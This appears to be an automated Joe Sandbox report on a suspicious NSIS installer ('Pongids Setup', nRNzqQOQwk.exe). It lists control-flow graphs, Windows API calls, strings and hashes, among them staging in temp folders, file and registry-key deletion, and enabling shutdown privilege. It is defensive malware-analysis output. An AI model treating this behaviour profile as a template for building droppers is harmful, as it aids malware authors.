4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

                                                                            Executed Functions

                                                                            Function 00403180 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 403180-4031b5 SetErrorMode GetVersion 1 4031b7-4031bf call 406139 0->1 2 4031c8 0->2 1->2 7 4031c1 1->7 4 4031cd-4031e0 call 4060cb lstrlenA 2->4 9 4031e2-403255 call 406139 * 2 #17 OleInitialize SHGetFileInfoA call 405da0 GetCommandLineA call 405da0 GetModuleHandleA 4->9 7->2 18 403261-403276 call 40583d CharNextA 9->18 19 403257-40325c 9->19 22 40333b-40333f 18->22 19->18 23 403345 22->23 24 40327b-40327e 22->24 27 403358-403372 GetTempPathA call 40314f 23->27 25 403280-403284 24->25 26 403286-40328e 24->26 25->25 25->26 28 403290-403291 26->28 29 403296-403299 26->29 34 403374-403392 GetWindowsDirectoryA lstrcatA call 40314f 27->34 35 4033ca-4033e4 DeleteFileA call 402cfa 27->35 28->29 31 40332b-403338 call 40583d 29->31 32 40329f-4032a3 29->32 31->22 51 40333a 31->51 37 4032a5-4032ab 32->37 38 4032bb-4032e8 32->38 34->35 52 403394-4033c4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40314f 34->52 53 403478-403488 call 403646 OleUninitialize 35->53 54 4033ea-4033f0 35->54 44 4032b1 37->44 45 4032ad-4032af 37->45 40 4032ea-4032f0 38->40 41 4032fb-403329 38->41 47 4032f2-4032f4 40->47 48 4032f6 40->48 41->31 49 403347-403353 call 405da0 41->49 44->38 45->38 45->44 47->41 47->48 48->41 49->27 51->22 52->35 52->53 66 4035ac-4035b2 53->66 67 40348e-40349e call 405596 ExitProcess 53->67 57 4033f2-4033fd call 40583d 54->57 58 403468-40346f call 403720 54->58 71 403433-40343d 57->71 72 4033ff-403428 57->72 64 403474 58->64 64->53 69 4035b4-4035cd GetCurrentProcess OpenProcessToken 66->69 70 40362e-403636 66->70 78 4035ff-40360d call 406139 69->78 79 4035cf-4035f9 LookupPrivilegeValueA AdjustTokenPrivileges 69->79 73 403638 70->73 74 40363c-403640 ExitProcess 70->74 76 4034a4-4034b8 call 405519 lstrcatA 71->76 77 40343f-40344c call 405900 71->77 80 40342a-40342c 72->80 73->74 89 4034c5-4034df lstrcatA lstrcmpiA 76->89 90 4034ba-4034c0 lstrcatA 76->90 77->53 88 40344e-403464 call 405da0 * 2 77->88 91 40361b-403625 ExitWindowsEx 78->91 92 40360f-403619 78->92 79->78 80->71 84 40342e-403431 80->84 84->71 84->80 88->58 89->53 94 4034e1-4034e4 89->94 90->89 91->70 95 403627-403629 call 40140b 91->95 92->91 92->95 97 4034e6-4034eb call 40547f 94->97 98 4034ed call 4054fc 94->98 95->70 106 4034f2-4034ff SetCurrentDirectoryA 97->106 98->106 107 403501-403507 call 405da0 106->107 108 40350c-403534 call 405da0 106->108 107->108 112 40353a-403556 call 405dc2 DeleteFileA 108->112 115 403597-40359e 112->115 116 403558-403568 CopyFileA 112->116 115->112 117 4035a0-4035a7 call 405c5b 115->117 116->115 118 40356a-40358a call 405c5b call 405dc2 call 405531 116->118 117->53 118->115 127 40358c-403593 CloseHandle 118->127 127->115
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 004031A5
                                                                            • GetVersion.KERNEL32 ref: 004031AB
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
                                                                            • #17.COMCTL32(00000007,00000009), ref: 004031F6
                                                                            • OleInitialize.OLE32(00000000), ref: 004031FD
                                                                            • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
                                                                            • GetCommandLineA.KERNEL32(Pongids Setup,NSIS Error), ref: 0040322E
                                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000000), ref: 00403241
                                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nRNzqQOQwk.exe",00000020), ref: 0040326C
                                                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
                                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
                                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
                                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
                                                                            • DeleteFileA.KERNELBASE(1033), ref: 004033CF
                                                                              • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                              • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                            • OleUninitialize.OLE32(?), ref: 0040347D
                                                                            • ExitProcess.KERNEL32 ref: 0040349E
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
                                                                            • ExitProcess.KERNEL32 ref: 00403640
                                                                              • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                            • String ID: "$"C:\Users\user\Desktop\nRNzqQOQwk.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nRNzqQOQwk.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Low$NSIS Error$Pongids Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K`v$~nsu
                                                                            • API String ID: 3329125770-3440488698
                                                                            • Opcode ID: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                                            • Instruction ID: 9be49b359e088d3119d2258a489a24960a077000951b0681bd3593dcca7d42e2
                                                                            • Opcode Fuzzy Hash: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                                            • Instruction Fuzzy Hash: 03C107706086816EE7116F719D4DA2F3EACAF86306F44457FF482B52E2C77C4A058B2E
                                                                            Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                            • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                                            • String ID:
                                                                            • API String ID: 4227406936-0
                                                                            • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                            • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                            • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                            • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                            Function 00405DC2 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 469 405dc2-405dcd 470 405de0-405df5 469->470 471 405dcf-405dde 469->471 472 405fe8-405fec 470->472 473 405dfb-405e06 470->473 471->470 474 405ff2-405ffc 472->474 475 405e18-405e22 472->475 473->472 476 405e0c-405e13 473->476 477 406007-406008 474->477 478 405ffe-406002 call 405da0 474->478 475->474 479 405e28-405e2f 475->479 476->472 478->477 481 405e35-405e6a 479->481 482 405fdb 479->482 483 405e70-405e7b GetVersion 481->483 484 405f85-405f88 481->484 485 405fe5-405fe7 482->485 486 405fdd-405fe3 482->486 487 405e95 483->487 488 405e7d-405e81 483->488 489 405fb8-405fbb 484->489 490 405f8a-405f8d 484->490 485->472 486->472 494 405e9c-405ea3 487->494 488->487 491 405e83-405e87 488->491 495 405fc9-405fd9 lstrlenA 489->495 496 405fbd-405fc4 call 405dc2 489->496 492 405f9d-405fa9 call 405da0 490->492 493 405f8f-405f9b call 405cfe 490->493 491->487 497 405e89-405e8d 491->497 507 405fae-405fb4 492->507 493->507 499 405ea5-405ea7 494->499 500 405ea8-405eaa 494->500 495->472 496->495 497->487 503 405e8f-405e93 497->503 499->500 505 405ee3-405ee6 500->505 506 405eac-405ec7 call 405c87 500->506 503->494 508 405ef6-405ef9 505->508 509 405ee8-405ef4 GetSystemDirectoryA 505->509 515 405ecc-405ecf 506->515 507->495 511 405fb6 507->511 513 405f63-405f65 508->513 514 405efb-405f09 GetWindowsDirectoryA 508->514 512 405f67-405f6a 509->512 516 405f7d-405f83 call 40600b 511->516 512->516 520 405f6c-405f70 512->520 513->512 518 405f0b-405f15 513->518 514->513 519 405ed5-405ede call 405dc2 515->519 515->520 516->495 522 405f17-405f1a 518->522 523 405f2f-405f45 SHGetSpecialFolderLocation 518->523 519->512 520->516 525 405f72-405f78 lstrcatA 520->525 522->523 526 405f1c-405f23 522->526 527 405f60 523->527 528 405f47-405f5e SHGetPathFromIDListA CoTaskMemFree 523->528 525->516 530 405f2b-405f2d 526->530 527->513 528->512 528->527 530->512 530->523
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
                                                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
                                                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
                                                                            • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
                                                                            • CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
                                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
                                                                            • lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 900638850-1230650788
                                                                            • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                            • Instruction ID: 6cdfcc9d134e5fa542626d346f44b404821d9f3efcf53b1aa70e88c92b4f8a03
                                                                            • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                            • Instruction Fuzzy Hash: A4610271A04A06AEEB115B24CC84BBF3BA8EB56314F54813BE541BA2D0D37D4981DF4E
                                                                            Function 00405642 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 531 405642-405668 call 405900 534 405681-405688 531->534 535 40566a-40567c DeleteFileA 531->535 537 40568a-40568c 534->537 538 40569b-4056ab call 405da0 534->538 536 40580b-40580f 535->536 539 405692-405695 537->539 540 4057b9-4057be 537->540 544 4056ba-4056bb call 405859 538->544 545 4056ad-4056b8 lstrcatA 538->545 539->538 539->540 540->536 543 4057c0-4057c3 540->543 546 4057c5-4057cb 543->546 547 4057cd-4057d5 call 4060a4 543->547 549 4056c0-4056c3 544->549 545->549 546->536 547->536 554 4057d7-4057eb call 405812 call 4055fa 547->554 552 4056c5-4056cc 549->552 553 4056ce-4056d4 lstrcatA 549->553 552->553 555 4056d9-4056f7 lstrlenA FindFirstFileA 552->555 553->555 570 405803-405806 call 404fb9 554->570 571 4057ed-4057f0 554->571 557 4056fd-405714 call 40583d 555->557 558 4057af-4057b3 555->558 564 405716-40571a 557->564 565 40571f-405722 557->565 558->540 560 4057b5 558->560 560->540 564->565 567 40571c 564->567 568 405724-405729 565->568 569 405735-405743 call 405da0 565->569 567->565 572 40572b-40572d 568->572 573 40578e-4057a0 FindNextFileA 568->573 581 405745-40574d 569->581 582 40575a-405765 call 4055fa 569->582 570->536 571->546 575 4057f2-405801 call 404fb9 call 405c5b 571->575 572->569 577 40572f-405733 572->577 573->557 579 4057a6-4057a9 FindClose 573->579 575->536 577->569 577->573 579->558 581->573 584 40574f-405758 call 405642 581->584 590 405786-405789 call 404fb9 582->590 591 405767-40576a 582->591 584->573 590->573 593 40576c-40577c call 404fb9 call 405c5b 591->593 594 40577e-405784 591->594 593->573 594->573
                                                                            APIs
                                                                            • DeleteFileA.KERNELBASE(?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                                            • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                                            • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                                            • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                                            • FindClose.KERNEL32(00000000), ref: 004057A9
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                                            • \*.*, xrefs: 004056AD
                                                                            • "C:\Users\user\Desktop\nRNzqQOQwk.exe", xrefs: 00405642
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-1228767592
                                                                            • Opcode ID: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                                            • Instruction ID: 760187f4f4892300bbc2109203202489edd73d97d78a60d5512a31c146a0733f
                                                                            • Opcode Fuzzy Hash: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                                            • Instruction Fuzzy Hash: 8F51D631804A08EADB216B618C45BBF7B78DF42714F14813BF955721D1D77C8982EE6E
                                                                            Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 784 402b0e-402b37 RegOpenKeyExA 785 402ba2-402ba6 784->785 786 402b39-402b44 784->786 787 402b5f-402b6f RegEnumKeyA 786->787 788 402b71-402b83 RegCloseKey call 406139 787->788 789 402b46-402b49 787->789 797 402b85-402b94 788->797 798 402ba9-402baf 788->798 790 402b96-402b99 RegCloseKey 789->790 791 402b4b-402b5d call 402b0e 789->791 793 402b9f-402ba1 790->793 791->787 791->788 793->785 797->785 798->793 799 402bb1-402bbf RegDeleteKeyA 798->799 799->793 800 402bc1 799->800 800->785
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Close$DeleteEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1912718029-0
                                                                            • Opcode ID: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                                            • Instruction ID: e8770432982ab8decd1ca443e4f50ff6a20a1eaa2a88b85c41c9a6e6fa4e92e0
                                                                            • Opcode Fuzzy Hash: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                                            • Instruction Fuzzy Hash: 49117F36900109FFEF119F90DE89DAE3B7DEB55384F004076FA05B10A0D3B8AE51AB69
                                                                            Function 004060A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(765F3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                                            • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
